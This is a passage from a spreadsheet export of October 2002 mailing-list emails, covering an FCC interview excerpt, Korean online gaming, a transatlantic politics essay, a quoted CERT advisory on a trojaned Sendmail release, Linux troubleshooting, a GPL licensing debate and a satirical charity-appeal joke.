as he likes to sayshould \nwait till the flaws manifest themselves and then use antitrust \nlitigation to fix them. He worked briefly at a corporate law firm, and \nthen became a protg of Joel Klein, the head of the antitrust division \nof the Clinton Justice Department and the man who led the government's \nlegal case against Microsoft. (He was recently appointed chancellor of \nthe New York public-school system.) It testifies to Powell's political \nskill that he is probably the only high official in the Bush \nAdministration who not only served in the Clinton Administration but \nalso maintains close ties to Bush's nemesis Senator John McCain, of \nArizona. One of the things about Powell that annoy people is his \nenduring love of law school"It's sort of like a law-school study \nsession over there," one Democratic former commissioner said. As if to \nconfirm the charge, Powell, when I arrived, introduced me to four law \nstudents, summer interns at the commission, whom he'd invited to sit in.\n\nI began by asking Powell whether he agreed with the founding assumptions \nof the F.C.C. For example, could private companies have apportioned the \nairwaves among themselves without the government being involved?\n\n"I think we'll never know," Powell said. "I don't think it's an \nautomatically bad idea, the way some people will argue. Land is probably \nthe best analogue. We don't seize all the land in the United States and \nsay, 'The government will issue licenses to use land.' If my neighbor \nputs a fence one foot onto my property line, there's a whole body of law \nabout what I can do about that, including whether I can tear it down. If \na wireless company was interfering with another wireless company, it's a \nsimilar proposition. There are scholars who argueindeed, the famous \nRonald Coase treatise that won the Nobel Prize was about thisthat \nspectrum policy is lunacy. The market could work this out, in the kinds \nof ways that we're accustomed to."\n\nTalking to Powell was fun. Unlike most high government officials, he \ndoesn't seem to be invested in appearing dignified or commanding. He \nslumps in his chair and fiddles with his tie and riffs. He speaks in \nironic air quotes. He's like your libertarian friend in college who \nenjoyed staying up all night asking impertinent rhetorical questions \nabout aspects of life that everybody else takes for granted but that he \nsees as sentimental or illogical. After a while, I asked him whether he \nthought his predecessors' excitement about the 1996 Telecommunications \nAct had been excessive.\n\n"I would start with a caveat," Powell said. "Look, I can't fault those \njudgments in and of themselves, given the time and what people thought. \nThey were not the only ones who were hysterical about the opportunities. \nBut, frankly, I've always been a little bit critical. First of all, \nanybody who works with the act knows that it doesn't come anywhere close \nto matching the hyperbole that was associated with it, by the President \non down, about the kinds of things it's going to open up. I mean, I \ndon't know what provisions are the information-superhighway provisions, \nor what provisions are so digitally oriented, or some of the things that \nwere a big part of the theatre of its introduction. When one starts \nreading the details, one searches, often in vain, for these provisions. \nBut, nonetheless, there was a rising dot-com excitement, and an Internet \nexcitement, and people thought this was historic legislation, and it \ncertainly was.\n\n"But. We were sucking helium out of balloons, with the kinds of \nexpectations that were being bandied around, and this is before the \neconomy or the market even gets in trouble. It was a dramatically \nexaggerated expectationby the leadership of the commission, by \npoliticians, by the market itself, by companies themselves. It was a \ngold rush, and led to some very detrimental business decisions, ones \nthat government encouraged by its policies, frankly. Everybody wanted to \nsee numbers go up on the board."\n\nPowell began imitating an imagined true believer in the Telecom Act. " \n'I want to see ten competitors. Twenty competitors! I want to see \nthirty-per-cent market share. Fifty-per-cent market share! I want the \nBells to bleed! Then we'll know we've succeeded.' " Now Powell returned \nto being Powell. "I think that expectation was astonishingly \nunrealistic, in the short term. They wanted to see it while they're \nthere. We were starting to get drunk on the juice we were drinking. And \nthe market was getting drunk on the juice we were drinking. There's no \nquestion, we went too soon too fast. Too many companies took on too much \ndebt too fast before the market really had a product, or a business \nmodel."\n\nHow could the Telecom Act have been handled better? "We could have \nchosen policies that were less hellbent on a single objective, and were \nslightly more balanced and put more economic discipline in the system," \nPowell said. "Money chased what seemed like government-promised \nopportunity. The problem with that is there's a morning after, and we're \nin it. And the problem is there is no short fix for this problem. This \ndebt is going to take years to bring down to a realistic level. In some \nways, for short-term gain, we paid a price in long-term stability."\n\nPowell went on to say that it might have turned out differently if there \nhad been a more "reasonable" level of investment. "No, we wouldn't have \nevery home in America with competitive choice yetbut we don't anyway. I \ndon't think it's the remonopolization of telephone service. I don't buy \nthat. The Bells will prosper, but did anybody believe they wouldn't? The \npart of the story that didn't materialize was that people thought so \nwould MCI WorldCom and Sprint."\n\nOther local phone companies, he added, hadn't materialized as viable \nbusinesses, either, and they never might. "Everybody's always saying, \n'The regulators did this and this and this.' But, candidly, the story's \nquite the opposite. I think the regulators bent over backward for six \nyears to give them a chance. Conditions don't get that good except once \nevery thirty years, and it didn't happen. So, whatever the reason, we're \nlooking at a WorldCom that's teetering. We're looking at a long-distance \nbusiness that has had a rapid decline in its revenue base. A.T. &amp; T. is \nbreaking itself up. Sprint has struggled."\n\nCould the F.C.C. have done anything to make the long-distance companies \nstronger? "At the F.C.C.? I think I'll just be blunt. My political \nanswer? Yes, there's all kinds of things we can do at the margin to try \nto help. But I can't find thirty billion dollars for WorldCom somewhere. \nI can't mitigate the impacts of an accounting scandal and an S.E.C. \ninvestigation. Were I king, it would be wonderful, but I don't have \nthose kinds of levers. I don't know whether anybody does. At some point, \ncompanies are expected to run themselves in a way that keeps them from \ndying." Powell couldn't have made it much clearer that he doesn't think \nit's his responsibility to do anything about the telecom crash. He has \ndemonstrated his sure political touch by making accommodationist \ngesturesin August, for example, five months after disbanding the \nF.C.C.'s Accounting Safeguards Division, Powell announced that he was \nappointing a committee to study accounting standards in the \ncommunications industry. But that shows that Powell is better at riding \nout the storm than, say, Harvey Pitt, his counterpart at the Securities \nand Exchange Commission, and does not mean that he plans to try to shore \nup the telecom industry.\n\nI asked Powell if it would bother him if, for most people, only one \ncompany provided cable television and only one provided local phone \nservice. "Yes," he said. "It concerns us that there's one of each of \nthose things, but let's not diminish the importance of there being one \nof each of those things. That still is a nice suite of communications \ncapabilities, even if they aren't direct analogues of each other." \nAnyway, Powell said, before long the phone companies will be able to \nprovide video service over their lines, and the cable companies will \nprovide data service over their lines, so there will be more choice. \n"So, yeah, we have this anxiety: we have one of everything. The question \nis, Does it stay that way?"\n\nThe concentration of ownership and the concentrated control of \ninformation did not appear to trouble Powell, either. He said that \npeople confuse bigness, which brings many benefits, with concentration, \nwhich distorts markets. "If this were just economics, it's easy. If you \nwere to say to me, 'Mike, just worry about economic concentration,' we \nknow how to do thatthe econometrics of antitrust. I can tell you when a \nmarket's too concentrated and prices are going to rise. The problem is \nother dimensions, like political, ideological, sometimes emotional. Take \nthe quest</t>
  </si>
  <si>
    <t>http://www.newyorker.com</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Tue, 8 Oct 2002 18:19:49 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 18:19:49 -0700</t>
  </si>
  <si>
    <t>[NYT] Korea's Real Rage for Virtual Games</t>
  </si>
  <si>
    <t>[URL]http://www.nytimes.com[/URL]\n\nBroadband's killer application  the one activity that dwarfs all others \nis online gaming, which 80 percent of South Koreans under 25 play, according\nto one recent study. Critics say the burgeoning industry is creating\nmillions of zombified addicts who are turning on and tuning into computer\ngames, and dropping out of school and traditional group activities, becoming\nuncommunicative and even violent because of the electronic games they play.\n\n"Game players don't have normal social relationships anymore," said Kim Hyun\nSoo, a 36-year-old psychiatrist who is chairman of the Net Addiction\nTreatment Center, one of many groups that have sprung up to cope with\nInternet game addiction. "Young people are losing the ability to relate to\nothers, except through games. People who become addicted are prone to\nviolence, even when they are not playing.\n\n- Jim</t>
  </si>
  <si>
    <t>http://www.nytimes.com</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 8 Oct 2002 18:18:20 -0400</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 18:18:20 -0400</t>
  </si>
  <si>
    <t>The Disappearing Alliance</t>
  </si>
  <si>
    <t>[URL]http://www.techcentralstation.com[/URL] The Disappearing Alliance By Dale Franks 10/08/2002 For over two generations, the countries of Western Europe have been our closest allies. We stood beside each other through the darkest days of the Cold War as partners in the North Atlantic Treaty Organization. We celebrated with them over the fall of the Soviet Empire and the liberation of Eastern Europe from the yoke of communism. Tragically, a generation from now, we may be bitter adversaries. Europe has increasingly fallen under the spell of a political ideology that Hudson Institute scholar John Fonte has termed "progressive transnationalism". The key doctrines of this form of post-communist progressivism contain some fairly pernicious ideas. Among these are the deconstruction of nationalism, the promotion of post-nationalist ideas of citizenship (i.e. a "global" citizenry), a redefinition of democracy, and the pooling of national sovereignty into multinational groups such as the United Nations. The European Union, itself a multinational organization built through the pooling of sovereignty by European nations, is post-democratic. While there is a European Parliament, the EU's power resides mainly in the unelected European Commission (EC) and its unelected President, who face few limits to their power. Instead of a limited, consensual form of government, where elected representatives promulgate constitutional laws, the EU has an appointed, oligarchic executive, along with a large attendant bureaucracy, whose orders are not constitutionally limited in any real sense. Moreover, the EU has been unwilling to accept the democratically expressed wishes of the people themselves when those wishes conflict with the results desired by the EU's political elite. Both the EC and the European Court of Justice regularly overturn the national laws of democratically elected EU member governments. This is a step backward in Europe's political development. European criticism of America is on the rise, and the European list of complaints about America is a long and growing one. They dislike the fact that our republican system of government is not based on proportional representation. They hate the fact that our citizens own guns. They despise the fact that we execute murderers. They resent the fact that our economy is so large, and that Americans consume so much. They also resent?and fear - the fact that we have the ability to project American power anywhere in the world. On August 9, 2002, Adrian Hamilton wrote a column in the UK's Independent newspaper, in which he identified the US as a rogue state who should be restrained, perhaps by a European military invasion, followed by a decade or so of occupation. Fortunately, the article is satirical not because it exaggerates the way European progressives view the US, but rather because the impotence of European military power makes the idea of an invasion of the US literally fantastic. At least, for now. Despite the tongue-in-cheek nature of this editorial, however, the fact remains that America is increasingly viewed this way by the European intellectual and political elite. The Europeans actively desire a world where the United Nations keeps in check the activities of sovereign states. Because they have built such a system in Europe, they feel it's valid for the rest of the world. America, however, is the biggest obstacle to such a system. The Europeans cannot understand why America places a higher value on the ethos of national sovereignty and limited, consensual, and constitutional government, than it does on compliance with international "norms." They view all departures from such norms as aberrant. Because the UN member states all have an equal vote in prescribing international norms, they assume that, since the process is ostensibly legitimate, the results must be as well. The trouble with this idea, of course, is that it gives the views of non-democratic, authoritarian states the same weight as those of free, democratic societies. It sanctifies the process, with no regard to the actual results. Thus, they are unable to make any moral distinction between the US refusals to join in a given international effort because we wish to preserve the liberty of our citizens, and similar refusals from Iraq because its dictator wishes to maintain his firm grip on power. Our repeated references to the US Constitution, and our unwillingness to bypass its provisions to comply with international norms, are incomprehensible to them. They assume, therefore, that our refusal is based on arrogance, rather than on a commitment to constitutional rights. None of this bodes well for the future of Euro-American friendship, or cooperation. If the Europeans continue to reject traditional liberalism in favor of the new progressivism, their criticism of the US will rise, while their tolerance of our differences will fall. Obviously, in such a political atmosphere, the opportunities for conflict will inevitably increase. That thought is frightening enough. Even more frightening, however, is the thought that such a conflict might be averted by our own acceptance of the new ideology of transnational progressivism.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www.techcentralstation.com</t>
  </si>
  <si>
    <t>To: rpm-list@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Tue, 8 Oct 2002 17:54:52 -0500</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 17:54:52 -0500</t>
  </si>
  <si>
    <t>rpm-list@freshrpms.net</t>
  </si>
  <si>
    <t>Apt repository authentication: it's time</t>
  </si>
  <si>
    <t>Cliped from the latest CERT.org warning list: ----------------------------------------------------------------------------------------------- "I. Description    The  CERT/CC  has received confirmation that some copies of the source    code  for  the  Sendmail  package have been modified by an intruder to    contain a Trojan horse.    The following files were modified to include the malicious code:      sendmail.8.12.6.tar.Z      sendmail.8.12.6.tar.gz    These  files  began  to  appear  in  downloads  from  the  FTP  server    ftp.sendmail.org  on  or  around  September  28,  2002.  The  Sendmail    development  team  disabled  the  compromised FTP server on October 6,    2002  at  approximately  22:15  PDT.  It  does  not appear that copies    downloaded  via  HTTP contained the Trojan horse; however, the CERT/CC    encourages  users  who  may  have  downloaded the source code via HTTP    during  this  time  period  to take the steps outlined in the Solution    section as a precautionary measure."      OK, it's now time to work out the PGP securing of apt repository traffic. I've never gotten anything but "sitename.whatever will not be authenticated" until running Redhat 8.0 when I get something about having "No Key" for various files.     What's it take to ensure we're covered against this kind of childish/moronic/Microsoft-era problems?   ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest, weil es eine lange, ssse Fahrt ist.  _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;Fork@xent.com&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Tue, 8 Oct 2002 17:02:08 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 17:02:08 -0700</t>
  </si>
  <si>
    <t>&lt;Fork@xent.com&gt;</t>
  </si>
  <si>
    <t>RE: The Disappearing Alliance</t>
  </si>
  <si>
    <t>&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of R.\nA.\n&gt; Hettinga\n&gt; Subject: The Disappearing Alliance\n&gt; \n&gt; [URL]http://www.techcentralstation.com[/URL]\n&gt; \n&gt; \n&gt; \n&gt; The Disappearing Alliance\n&gt; By Dale Franks 10/08/2002\n\n&gt; Obviously, in such a\n&gt; political atmosphere, the opportunities for conflict will inevitably\n&gt; increase.\n\nGiven current trends, particularly in demographics, such conflict won't\nbe military.  Europe wouldn't stand a chance now and things are getting\nworse in a hurry.  They are SOL.\n\nNot to mention that when push comes to shove they wouldn't stand united.\n\n&gt; \n&gt; That thought is frightening enough. Even more frightening, however, is\nthe\n&gt; thought that such a conflict might be averted by our own acceptance of\nthe\n&gt; new ideology of transnational progressivism.\n\nNow that is a scary thought.\n]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Tue, 8 Oct 2002 16:47:31 -0400</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 16:47:31 -0400</t>
  </si>
  <si>
    <t>Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;</t>
  </si>
  <si>
    <t>process music: Mekons</t>
  </si>
  <si>
    <t>[URL]http://reuters.com[/URL]\n\nWorking this loose knit fashion is what keeps the Mekons so exciting, \nLangford said. "When the Mekons was our whole day job, it became a \ndrudgery," he said. " Sometimes we get bogged down and trapped. But we're \nusually pretty greasy enough to bite our leg off, squirm free and run \noff."</t>
  </si>
  <si>
    <t>http://reuters.com</t>
  </si>
  <si>
    <t>To: "spamassassin-talk-admin@example.sourceforge.net" &lt;spamassassin-talk-admin@example.sourceforge.net&gt;\nFrom: "postmaster@jpci.net" &lt;postmaster@jpci.net&gt;\nDate: Tue, 8 Oct 2002 16:30:44 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 16:30:44 +0100</t>
  </si>
  <si>
    <t>"postmaster@jpci.net" &lt;postmaster@jpci.net&gt;</t>
  </si>
  <si>
    <t>"spamassassin-talk-admin@example.sourceforge.net" &lt;spamassassin-talk-admin@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Failed mail: Banned or potentially offensive material</t>
  </si>
  <si>
    <t>This is a MIME-encapsulated message --==_15304473447567@buffy.jpci.net==_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Content-Disposition: inline Your message was not delivered to       daz@jpci.net   This mail message contains banned or potentially offensive text. --==_15304473447567@buffy.jpci.net==_ Content-Type: message/delivery-status Content-Transfer-Encoding: 7bit Content-Disposition: inline Reporting-MTA: dns;buffy.jpci.net   Final-Recipient: rfc822;daz@jpci.net Action: failure --==_15304473447567@buffy.jpci.net==_ Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Received: from usw-sf-list1-b.sourceforge.net ([10.3.1.13] helo=usw-sf-list1.sourceforge.net) 	by usw-sf-list2.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian)) 	id 17ywHF-0003wQ-00; Tue, 08 Oct 2002 08:28:05 -0700 Received: from dsl092-072-213.bos1.dsl.speakeasy.net ([66.92.72.213] helo=blazing.arsecandle.org) 	by usw-sf-list1.sourceforge.net with esmtp  	(Cipher TLSv1:DES-CBC3-SHA:168) (Exim 3.31-VA-mm2 #1 (Debian)) 	id 17ywGP-000544-00 	for ; Tue, 08 Oct 2002 08:27:14 -0700 Received: (qmail 31751 invoked from network); 8 Oct 2002 15:26:25 -0000 Received: from localhost (HELO RAGING) (rod@127.0.0.1)   by localhost with SMTP; 8 Oct 2002 15:26:25 -0000 Message-ID: &lt;042a01c26edf$16332c50$b554a8c0@RAGING&gt; From: "rODbegbie"  To: "Odhiambo Washington" , 	"spamassassin"  References: &lt;20021008130510.GA23757@ns2.wananchi.com&gt; Subject: Re: [SAtalk] spamd error messages Organization: Arsecandle Industries, Inc. X-Habeas-SWE-1: winter into spring X-Habeas-SWE-2: brightly anticipated X-Habeas-SWE-3: like Habeas SWE (tm) X-Habeas-SWE-4: Copyright 2002 Habeas (tm) X-Habeas-SWE-5: Sender Warranted Email (SWE) (tm). The sender of this X-Habeas-SWE-6: email in exchange for a license for this Habeas X-Habeas-SWE-7: warrant mark warrants that this is a Habeas Compliant X-Habeas-SWE-8: Message (HCM) and not spam. Please report use of this X-Habeas-SWE-9: mark in spam to . MIME-Version: 1.0 Content-Type: multipart/signed; 	micalg=SHA1; 	protocol="application/x-pkcs7-signature"; 	boundary="----=_NextPart_000_0426_01C26EBD.8DF911E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: spamassassin-talk-admin@example.sourceforge.net Errors-To: spamassassin-talk-admin@example.sourceforge.net X-BeenThere: spamassassin-talk@example.sourceforge.net X-Mailman-Version: 2.0.9-sf.net Precedence: bulk List-Help:  List-Post:  List-Subscribe: , 	 List-Id: Talk about SpamAssassin  List-Unsubscribe: , 	 List-Archive:  X-Original-Date: Tue, 8 Oct 2002 11:26:32 -0400 Date: Tue, 8 Oct 2002 11:26:32 -0400 This is a multi-part message in MIME format. ------=_NextPart_000_0426_01C26EBD.8DF911E0 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: 7bit Odhiambo Washington wrote: &gt; After being bitten by bugs in 2.41, I've downgraded to 2.31 but now spamd &gt; spews errors like I've never seen before: Delete the contents of /usr/local/share/spamassassin and reinstall.  There are some files that were new to v2.4x, so they won't be overwritten when you downgrade. rOD. -- "Fast!  Fast!  Faster!  Bring the beef, you bastard," cries Paula Abdul, "and don't forget the pasta!" Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt; ------=_NextPart_000_0426_01C26EBD.8DF911E0 Content-Type: application/x-pkcs7-signature; 	name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; 	filename="smime.p7s" MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJIjCCAnow ggHjoAMCAQICARcwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxHDAaBgNVBAoTE0VxdWlm YXggU2VjdXJlIEluYy4xJjAkBgNVBAMTHUVxdWlmYXggU2VjdXJlIGVCdXNpbmVzcyBDQS0xMB4X DTAyMDQxODE1MjkzN1oXDTIwMDQxMzE1MjkzN1owTjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUdl b1RydXN0IEluYy4xJzAlBgNVBAMTHkdlb1RydXN0IFRydWUgQ3JlZGVudGlhbHMgQ0EgMjCBnzAN BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAspcspZISpYX/aJqWoYcSyyGqFby3OvsepRzLRU0ENDJR wJo7DwFpirRFOUQkTkKXsY6BQzX/CeCRrn9i4ny5gcXuI2JSyrSmDwobbwl52n5cPEbHGcebybWd KfAf8vvkxYUnTmDZPtt2ob5RNpJTeTiq9MpNCB/5G7Ocr1hEljcCAwEAAaNjMGEwDgYDVR0PAQH/ BAQDAgHGMB0GA1UdDgQWBBQig0tNIAIMMfR8WrAaTRXIeF0RSTAPBgNVHRMBAf8EBTADAQH/MB8G A1UdIwQYMBaAFEp4MlIR21kWNl7fwRQ2QGpHfEyhMA0GCSqGSIb3DQEBBQUAA4GBACmw3z+sLsLS fAfdECQJPfiZFzJzSPQKLwY7vHnNWH2lAKYECbtAFHBpdyhSPkrj3KghXeIJnKyMFjsK6xd1k1Yu wMXrauUH+HIDuZUg4okBwQbhBTqjjEdo/cCHILQsaLeU2kM+n5KKrpb0uvrHrocGffRMrWhz9zYB lxoq0/EEMIICgjCCAeugAwIBAgIBBDANBgkqhkiG9w0BAQQFADBTMQswCQYDVQQGEwJVUzEcMBoG A1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1c2lu ZXNzIENBLTEwHhcNOTkwNjIxMDQwMDAwWhcNMjAwNjIxMDQwMDAwWjBTMQswCQYDVQQGEwJVUzEc MBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1 c2luZXNzIENBLTEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4vGbwXt3fek6lfWg0XTzQa DJj0ItlZ1MRoRvC0NcWFAyDGr0WlIVFFQesWWDYyb+JQYmT5/VGcqiTZ9J2DKocKIdMSODRsjQBu WqDZQu4aIZX5UkxVWsUPOE9G+m34LjXWHXzr4vCwdYDIqROsvojvOm6rXyo4YgKwEnv+j6YDAgMB ------=_NextPart_000_0426_01C26EBD.8DF911E0-- --==_15304473447567@buffy.jpci.net==_--</t>
  </si>
  <si>
    <t>http://www.groovymother.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Tue, 8 Oct 2002 16:24:06 +0200</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 16:24:06 +0200</t>
  </si>
  <si>
    <t>Re: mplayer not working for me</t>
  </si>
  <si>
    <t>Once upon a time, Roi wrote : &gt; mplayer works with dga (if i am root) and works with x11 &gt; and always worked with sdl (but not now with redhat 8) &gt; now it gives black screen window and play the music of the movie. Strange, because as I said in an earlier post, it works for me. Maybe you're missing the SDL_image or something? :-/ Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.28 0.17 0.13 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Tue, 8 Oct 2002 15:43:12 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 15:43:12 -0700</t>
  </si>
  <si>
    <t>Quoting Paul Linehan (plinehan@yahoo.com):\n\n&gt; The point here is that (under French law) the author can change the\n&gt; terms of the licence arbitarily. This is because any granting of\n&gt; rights by an author must be clearly delimited in terms of how long,\n&gt; where, to whom, dates and times.\n\nThe GPL and similar licences are explicitly permanent grants of rights\nattached to an instance of his work.  (The other stuff mentioned\nconcerns contract law, e.g., the required element of privity, etc.)\n\n&gt; In the absence of such limitations, the original author has the right\n&gt; to change his software back to closed on a whim.\n\nNo, the author has the right to issue _additional_ instances under a\ndifferent licence, such as a proprietary ("closed" [sic]) licence.  \n\n&gt; Rick Moen makes the point that it is not a sale but rather a granting\n&gt; of rights which are not default. \n&gt; \n&gt; See the bit about even the granting of rights by an author having to\n&gt; be explicitly specified - under French law.\n\nThe analysis, here and elsewhere, concerns contract law.  This isn't\ncontract law.\n\nThis isn't the first time copyright attorneys have stumbled on this\nsubject.  I'm sure it won't be the last.\n\n-- \nCheers,              "The front line of defense against such sophisticated \nRick Moen            viruses is a continually evolving computer operating \nrick@linuxmafia.com  system that attracts the efforts of eager software\n                     developers."  -- Bill Gates         \n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 8 Oct 2002 14:27:40 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 14:27:40 +0100</t>
  </si>
  <si>
    <t>[ILUG] cups question</t>
  </si>
  <si>
    <t>I seem to be having a little trouble with it. My printers.conf is: Info Hp4050 Location locals DeviceURI ipp://192.168.2.90:9100/ State Idle Accepting Yes JobSheets none none QuotaPeriod 0 PageLimit 0 KLimit 0  and cupds uses that to make a printcap of: lp:  Sounds dodgy to me. If someone has an example printers.conf/printcap for a JetDirect printer, I'd appreciate it if they sent it on. John --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Andy &lt;andy@r2-dvd.org&gt;\nDate: Tue, 8 Oct 2002 14:20:39 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 14:20:39 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] FW: please give generously</t>
  </si>
  <si>
    <t>-----Original Message-----\n\nSubject: please give generously\n\n&gt; &gt;\n&gt; &gt;\n&gt; &gt;\n&gt; &gt; Please give generously...\n&gt; &gt;\n&gt; &gt; URGENT - DUDLEY EARTHQUAKE APPEAL\n&gt; &gt;\n&gt; &gt; At 00:54 on Monday 23 September an earthquake measuring 4.8 on the\n&gt; &gt;\n&gt; &gt; Richter scale hit Dudley,UK causing untold disruption and distress -\n&gt; &gt;\n&gt; &gt; * Many were woken well before their giro arrived\n&gt; &gt;\n&gt; &gt; * Several priceless collections of mementos from the Balearics and\n&gt; &gt;\n&gt; &gt; Spanish costas were damaged\n&gt; &gt;\n&gt; &gt; * Three areas of historic and scientifically significant litter were\n&gt; &gt;\n&gt; &gt; disturbed\n&gt; &gt;\n&gt; &gt; * Thousands are confused and bewildered, trying to come to terms with\n&gt; &gt;\n&gt; &gt; the fact that something interesting has happened in Dudley\n&gt; &gt;\n&gt; &gt; One resident, Donna-Marie Dutton, a 17 year old mother-of-three said "It\n&gt; &gt;\n&gt; &gt; was such a shock, little Chantal-Leanne came running into my bedroom\n&gt; &gt;\n&gt; &gt; crying. My youngest two, Tyler-Morgan and Megan-Storm slept through it.\n&gt; &gt;\n&gt; &gt; I was still shaking when I was watching Trisha the next morning."\n&gt; &gt;\n&gt; &gt; Apparently though, looting did carry on as normal.\n&gt; &gt;\n&gt; &gt; The British Red Cross have so far managed to ship 4000 crates of Sunny\n&gt; &gt;\n&gt; &gt; Delight to the area to help the stricken masses.\n&gt; &gt;\n&gt; &gt; Rescue workers are still searching through the rubble and have found\n&gt; &gt;\n&gt; &gt; large quantities of personal belongings including benefit books and\n&gt; &gt;\n&gt; &gt; jewellery from Elizabeth Duke at Argos.\n&gt; &gt;\n&gt; &gt; HOW YOU CAN HELP\n&gt; &gt;\n&gt; &gt; * 2 buys chips, scraps and blue pop for a family of four\n&gt; &gt;\n&gt; &gt; * 10 can take a family to Stourport for the day, where children can\n&gt; &gt;\n&gt; &gt; play on an unspoiled canal bank among the national collection of\n&gt; &gt;\n&gt; &gt; stinging nettles\n&gt; &gt;\n&gt; &gt; * 22p buys a biro for filling in a spurious compensation claim\n&gt; &gt;\n&gt; &gt; PLEASE ACT NOW\n&gt; &gt;\n&gt; &gt; Simply email us by return with your credit card details and we'll do the\n&gt; &gt;\n&gt; &gt; rest! If you prefer to donate cash, there are collection points\n&gt; &gt;\n&gt; &gt; available at your local branches of Argos, Iceland and Clinton Cards.\n&gt; &gt;\n\n\n\n\n_________________________________________________________________\nJoin the world's largest e-mail service with MSN Hotmail. \n[URL]http://www.hotmail.com[/URL]\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nHome Selling? Try Us!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.hotmail.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "Irish Linux Users Group" &lt;ilug@linux.ie&gt;\nFrom: "Breathnach, Proinnsias (Dublin)" &lt;breatpro@exchange.ie.ml.com&gt;\nDate: Tue, 8 Oct 2002 14:00:48 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 14:00:48 +0100</t>
  </si>
  <si>
    <t>"Irish Linux Users Group" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] cheap linux PCs</t>
  </si>
  <si>
